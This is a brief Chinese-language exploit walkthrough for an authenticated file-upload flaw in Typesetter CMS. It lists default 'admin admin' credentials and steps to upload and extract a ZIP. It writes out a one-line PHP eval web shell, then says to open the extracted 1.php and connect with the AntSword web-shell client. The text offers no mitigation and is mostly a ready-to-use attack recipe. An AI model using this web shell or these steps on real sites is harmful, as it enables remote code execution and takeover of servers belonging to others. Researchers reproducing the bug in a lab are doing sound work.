1.漏洞描述
Typesetter CMS 内容管理系统是Php源码频道下深受用户喜爱的软件。 Typesetter CMS 存在代码问题漏洞,该漏洞源于允许管理员通过ZIP归档中的. PHP文件上传和执行任意PHP代码。 账号密码: admin admin
2.内容-已上传的文档-上传
3.选择一个zip压缩包上传
<?php @eval($_POST['cmd']);?>
4.选择上传的压缩包,选择解压缩
5.压缩包解压后,右键选择解压出的1.php,右键选择打开,记录下上传地址后直接蚁剑登录。